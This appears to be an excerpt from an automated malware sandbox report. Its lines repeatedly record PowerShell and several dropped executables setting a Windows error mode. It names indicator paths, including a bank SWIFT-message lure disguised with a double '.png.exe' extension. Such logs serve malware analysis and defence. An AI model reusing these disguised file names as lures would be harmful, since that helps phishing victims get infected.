Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
